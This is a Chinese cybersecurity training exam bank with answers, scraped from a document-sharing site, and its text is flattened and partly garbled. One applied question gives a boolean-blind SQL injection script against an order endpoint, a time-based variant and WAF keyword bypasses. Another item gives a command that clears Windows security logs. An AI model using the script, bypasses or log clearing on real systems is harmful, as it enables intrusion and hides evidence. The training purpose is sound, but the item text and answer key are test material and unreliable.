版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领
文档简介
网络安全培训考试题库(附答案)一、单项选择题(每题1分,共30分。每题只有一个正确答案,请将正确选项字母填入括号内)1.以下哪一项最能准确描述“零信任”安全模型的核心理念?A.内部网络默认可信B.永不信任,持续验证C.以防火墙为边界D.以VPN为唯一入口答案:B2.在TLS1.3握手过程中,用于实现前向保密的关键机制是:A.RSA密钥传输B.静态DH密钥交换C.ECDHE密钥交换D.预共享密钥PSK答案:C3.某企业部署了EDR终端检测与响应系统,其主要优势不包括:A.实时行为分析B.自动隔离可疑进程C.替代补丁管理D.威胁狩猎能力答案:C4.关于OWASPTop102021版,下列哪一项首次被单独列为一类风险?A.注入B.失效的访问控制C.不安全的设计D.使用含有已知漏洞的组件答案:C5.利用“同源策略”可有效缓解以下哪种攻击?A.CSRFB.XSSC.JSONP劫持D.点击劫持答案:C6.在Linux系统中,若文件权限为“rwsrxrx”,则其中的s标志表示:A.SetGIDB.SetUIDC.StickyBitD.强制锁定答案:B7.以下哪条命令可用于查看Windows本地安全策略中“用户权限分配”?A.gpresult/hB.secedit/exportC.msconfigD.tasklist答案:B8.关于国密算法SM2的正确描述是:A.分组长度为128位B.基于椭圆曲线离散对数难题C.仅支持数字签名D.密钥长度固定1024位答案:B9.在容器安全场景下,最能有效限制容器逃逸的技术是:A.关闭SELinuxB.启用seccompprofileC.使用bridge网络D.共享PID命名空间答案:B10.当发现GitHub仓库意外上传AWSAccessKey后,第一时间应:A.立即删除仓库B.回滚commit后强制推送C.在AWS控制台禁用该密钥并轮换D.修改.gitignore答案:C11.关于DNSSEC,下列说法错误的是:A.使用RRSIG记录提供签名B.依赖DS记录建立信任链C.能防止DNS缓存污染D.提供数据机密性答案:D12.以下哪项最能体现“左移安全”原则?A.上线前渗透测试B.代码提交阶段运行SASTC.生产环境WAF规则调优D.日志集中存储答案:B13.在IPv6中,用于替代ARP的协议是:A.NDPB.DHCPv6C.ICMPv6D.MLD答案:A14.关于勒索软件防御,下列措施最直接针对“横向移动”阶段的是:A.网络分段B.定期离线备份C.邮件网关沙箱D.主机加固基线答案:A15.利用BurpSuite的哪一模块可主动扫描OWASPTop10漏洞?A.IntruderB.RepeaterC.ScannerD.Decoder答案:C16.在Android应用逆向中,用于反编译dex文件得到Java源码的常用工具是:A.gdbB.jadxC.fridaD.objdump答案:B17.以下哪条HTTP响应头可指示浏览器仅通过HTTPS访问站点一段时间?A.HSTSB.CSPC.XFrameOptionsD.XContentTypeOptions答案:A18.关于“数据脱敏”技术,下列哪项属于“可逆脱敏”?A.掩码B.哈希加盐C.格式保留加密D.截断答案:C19.在Python代码审计中,下列哪段代码存在SQL注入风险?A.cursor.execute("SELECTFROMusersWHEREid=%s",(user_id,))B.cursor.execute(f"SELECTFROMusersWHEREid={user_id}")C.使用ORM框架QueryBuilderD.使用参数化存储过程答案:B20.关于“红队”与“渗透测试”区别,正确的是:A.红队无需报告B.渗透测试更侧重单点漏洞C.红队仅使用开源工具D.渗透测试包含物理入侵答案:B21.在Windows日志中,事件ID4624表示:A.账户登录失败B.账户成功登录C.权限提升D.对象访问答案:B22.关于“微隔离”(MicroSegmentation)技术,下列哪项描述最准确?A.基于VLAN的大段划分B.以进程级颗粒度控制东西向流量C.仅适用于物理服务器D.依赖硬件防火墙答案:B23.以下哪项属于“业务逻辑漏洞”典型案例?A.通过目录遍历下载/etc/passwdB.修改订单ID查看他人订单C.利用Heartbleed读取内存D.暴力破解SSH口令答案:B24.在公钥基础设施中,负责发布证书撤销列表的组件是:A.RAB.CAC.VAD.OCSP响应器答案:B25.关于“内存安全”语言,下列哪项说法正确?A.Java完全杜绝缓冲区溢出B.Rust通过所有权模型在编译期消除悬垂指针C.Python内置垃圾回收故无内存泄漏D.C++11智能指针可100%防止UAF答案:B26.以下哪条命令可用于查看Linux系统当前监听端口对应的进程?A.netstattulnpB.lsla/procC.lsmodD.dmesg答案:A27.在威胁情报中,STIX格式主要用于描述:A.漏洞细节B.威胁主体、攻击模式、IOC等C.数据包载荷D.安全基线答案:B28.关于“云原生”安全,哪项最能体现“责任共担模型”?A.云服务商负责虚拟机内部加固B.客户负责IAM配置C.云服务商负责客户数据分类D.客户负责物理机房安全答案:B29.在SocialEngineering攻击中,攻击者冒充IT支持要求用户提供密码,属于:A.诱饵B.假托C.钓鱼D.垃圾搜寻答案:B30.关于“量子计算”对密码学的影响,下列算法中目前被认为可抵抗量子攻击的是:A.RSA2048B.ECCP256C.AES256D.McEliece答案:D二、多项选择题(每题2分,共20分。每题有两个或两个以上正确答案,多选、少选、错选均不得分)31.以下哪些属于常见的WebShell连接工具?A.中国菜刀B.蚁剑C.冰蝎D.Nmap答案:A、B、C32.关于“日志伪造”攻击,防御措施包括:A.对换行符过滤B.统一日志格式为JSONC.使用syslog权限分离D.关闭日志功能答案:A、B、C33.以下哪些技术可用于实现“多因素认证”?A.硬件UKeyB.短信OTPC.静态口令D.指纹答案:A、B、D34.在Kubernetes安全加固中,哪些做法能有效降低容器逃逸风险?A.启用PodSecurityPolicy/PSP或OPAGatekeeperB.以root身份运行容器C.挂载宿主机/proc文件系统D.使用只读根文件系统答案:A、D35.关于“数据分类分级”,下列哪些属于国家推荐的核心级别?A.核心数据B.重要数据C.一般数据D.公开数据答案:A、B36.以下哪些属于“供应链”攻击典型案例?A.SolarWindsOrion后门B.CodecovBash上传器被篡改C.利用Struts2漏洞攻击EquifaxD.CCleaner被植入恶意代码答案:A、B、D37.在WiFi安全中,WPA3相对于WPA2的改进包括:A.采用SAE抵抗离线字典攻击B.前向保密默认启用C.取消802.1XD.增强开放网络加密(OWE)答案:A、B、D38.以下哪些命令可用于抓取Linux系统内存镜像?A.ddB.limeC.fmemD.tcpdump答案:A、B、C39.关于“灰盒”测试,下列描述正确的是:A.测试人员拥有部分源代码B.模拟外部攻击者零知识C.可结合代码与运行态分析D.通常发现漏洞效率高于黑盒答案:A、C、D40.以下哪些属于“隐私计算”技术范畴?A.联邦学习B.安全多方计算C.差分隐私D.同态加密答案:A、B、C、D三、填空题(每空1分,共20分)41.在Windows系统中,用于存储用户哈希的SAM文件位于路径__________。答案:%SystemRoot%\system32\config\SAM42.利用__________攻击可使受害者浏览器向目标站点发送携带Cookie的非预期请求。答案:CSRF43.在Linux中,若需限制某用户最多打开1024个文件,应修改__________配置文件中的nofile参数。答案:/etc/security/limits.conf44.国密SM4分组密码算法采用的密钥长度为__________位。答案:12845.在SQL注入中,使用__________函数可获取MySQL当前数据库名称。答案:database()46.事件响应生命周期中,包含准备、检测、遏制、根除、__________、总结六个阶段。答案:恢复47.在AndroidManifest.xml中,若将android:allowBackup设置为true,可能导致__________攻击。答案:备份导出/数据泄露48.利用__________工具可对iOS应用进行砸壳,获取解密后的ipa。答案:fridaiosdump或Clutch(任一即可)49.在IPv6地址2001:db8::1/64中,前缀长度为__________。答案:6450.在Windows日志清除痕迹时,wevtutilcl________命令可清除安全日志。答案:Security51.在公钥证书中,若ExtendedKeyUsage包含OID..1,表示该证书可用于__________。答案:服务器身份验证52.利用__________技术可在不泄露明文前提下,验证两个文件内容是否一致。答案:哈希/摘要53.在Kubernetes中,Service类型为__________时,可将Pod暴露到集群外部同一节点的静态端口。答案:NodePort54.在Python中,使用__________模块可对用户输入进行HTML转义,防止XSS。答案:html55.在Wireshark中,过滤表达式“tcp.flags.syn==1andtcp.flags.ack==0”可抓取__________包。答案:SYN56.在密码策略中,要求用户密码至少包含大写字母、小写字母、数字、特殊字符四类中的三类,属于__________原则。答案:复杂性57.利用__________命令可查看Linux系统当前加载的内核模块。答案:lsmod58.在威胁狩猎中,使用“PID异常高但进程名伪装系统进程”属于__________指标。答案:行为/异常(均可)59.在HTTPS站点中,若证书链缺失中间证书,会导致浏览器提示__________错误。答案:证书链不完整/不受信任60.在Windows中,使用__________命令可查看当前系统开放共享。答案:netshare四、判断题(每题1分,共10分。正确打“√”,错误打“×”)61.SHA256算法对同一输入必然产生相同长度的输出。答案:√62.在Linux中,若文件权限为000,则root用户也无法读取该文件。答案:×63.使用HTTPS即可完全防止中间人攻击,无需证书校验。答案:×64.在Kubernetes中,Pod之间默认禁止通信,需显式创建NetworkPolicy放行。答案:×65.国密SM3算法输出长度为256位。答案:√66.在Windows中,关闭UAC可彻底关闭所有权限提升提示。答案:√67.使用JWT时,将算法设为“none”可导致绕过验证。答案:√68.在SQL注入中,使用盲注无需获取错误回显即可推断数据。答案:√69.在Android中,Debug版本apk默认开启android:debuggable=true,可被任意调试。答案:√70.使用VPN即可隐藏用户所有应用层行为,防止网站追踪。答案:×五、简答题(每题5分,共30分)71.简述“权限维持”在APT攻击中的典型手法及对应防御措施。答案:典型手法:1.创建计划任务/系统服务;2.注册表Run键;3.启动文件夹;4.劫持DLL;5.植入Rootkit。防御:1.基线核查自启动项;2.应用白名单;3.EDR行为监测;4.最小权限原则;5.定期离线镜像比对。72.说明“同源策略”与“CORS”之间的关系,并给出正确配置CORS的示例响应头。答案:同源策略限制不同源之间DOM与AJAX交互;CORS为服务器显式放宽该策略的机制。示例:AccessControlAllowOrigin:;AccessControlAllowCredentials:true;AccessControlAllowMethods:GET,POST;AccessControlAllowHeaders:ContentType。73.概述“数据脱敏”在金融测试环境中的应用场景及三种脱敏算法。场景:生产数据需向测试、外包、分析环境共享,防止泄露真实客户信息。算法:1.格式保留加密(FPE),如加密信用卡号保持16位数字;2.掩码,如手机号中间四位替换为;3.哈希加盐,如将身份证号SHA256后取前8位作为伪ID。74.说明“量子密钥分发”(QKD)的基本原理及现网部署挑战。原理:利用量子不可克隆与测量扰动特性,通过BB84协议在光纤中传输偏振光子,双方比对基矢后生成一致密钥,窃听会引入误码率被检测。挑战:1.光纤衰减限制距离(<100km);2.成码率低(Mbps级);3.设备昂贵;4.需与现有PKI融合;5.中继节点安全。75.给出“零日漏洞”商业化流转的伦理争议,并提出治理建议。争议:1.黑市高价刺激攻击;2.政府囤积用于网络战;3.厂商响应迟缓;4.研究人员披露渠道缺失。治理:1.建立政府认证漏洞众测平台;2.立法禁止向制裁名单出售;3.给予税收减免鼓励厂商SRC;4.推动ISO标准化披露时限;5.建立国际漏洞共享白名单。76.说明“左移安全”在DevSecOps流水线中的四项关键实践。1.代码提交触发SAST,阻断高危漏洞合并;2.依赖库SCA扫描,强制升级CVE>7.0组件;3.IaC模板(Terraform)中嵌入安全组规则审计;4.单元测试阶段引入PropertybasedFuzz,自动生成异常输入。六、应用题(共40分)77.综合渗透测试题(15分)背景:某电商站点使用PHP7.4+MySQL8.0,订单查询接口GET/order.php?id=123。测试发现id参数存在SQL注入,但无回显错误。任务:(1)写出利用布尔盲注获取当前数据库名的完整Python脚本(使用requests库,二分法逐字符)。(2)说明如何转写脚本到时间盲注,并给出关键代码行。(3)给出WAF拦截关键字“select”时的两个绕过方法。答案:(1)```pythonimportrequests,stringurl="http://target/order.php"dbname=""chars=string.ascii_lowercase+string.digits+"_"foriinrange(1,30):low,high=0,len(chars)1whilelow<=high:mid=(low+high)//2ch=chars[mid]payload=f"?id=123andascii(substring(database(),{i},1))>{ord(ch)}"r=requests.get(url+payload,cookies={"PHPSESSID":"xxx"})if"订单详情"inr.text:low=mid+1else:high=mid1dbname+=chars[low1]print(dbname)```(2)转时间盲注:将payload改为`id=123andif(ascii(substring(database(),{i},1))>{ord(ch)},sleep(2),0)`,通过测量响应时间差异判断真假。(3)绕过:1.大小写混合:SeLeCT;2.内联注释:sel//ect;3.双写:seselectlect;4.编码:%73%65%6c%65%63%74。78.日志分析取证题(10分)给出一段Linuxauth.log片段:```Jun2114:32:01websshd[31415]:Failedpasswordforrootfrom5port52341ssh2Jun2114:32:02websshd[31415]:Failedpasswordforrootfrom5port52341ssh2Jun2114:32:04websshd[31415]:Acceptedpasswordforrootfrom5port52341ssh2Jun2114:32:04websystemd[31418]:pam_unix(systemduser:session):sessionopenedforuserrootby(uid=0)```问题:(1)判断攻击是否成功,并给出依据。(2)给出后续取证需收集的三类
温馨提示
- 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
- 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
- 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
- 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
- 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
- 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
- 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
最新文档
- 儿科用药护理要点
- 杂化轨道理论简介(二)课件2026-2027学年人教版高二下学期化学选择性必修二
- 消防管理制度及应急预案
- 2026中国建设科技秋招试题及答案
- 2026年江苏省兴化市乐吾实验学校八年级生物第二学期期末学业质量监测模拟试题含解析
- 2026中国检验认证集团校招面试题及答案
- 2026中国化学工程校招面试题及答案
- 4s店培训奖惩制度
- 4s店投诉奖惩制度
- 京东物流业务合作案例分析报告
- 2025年广东省中考物理试题卷(含答案)
- 航运企业合规管理制度
- 2026年高考语文备考之非连续性文本阅读训练(人工智能、科技文化)
- 幼儿园伙食费管理制度
- 月结60天合同协议书
- 肉羊高效健康养殖与疫病防控技术培训
- 养老院食品安全培训
- 全球核安全形势课件
- 《婴幼儿常见病识别与预防》高职早期教育专业全套教学课件
- 《智能制造基础与应用》课件全套 第1-8章 绪论、智能制造数字化基础- 智能制造应用
- 供电所所长安全演讲
评论
0/150
提交评论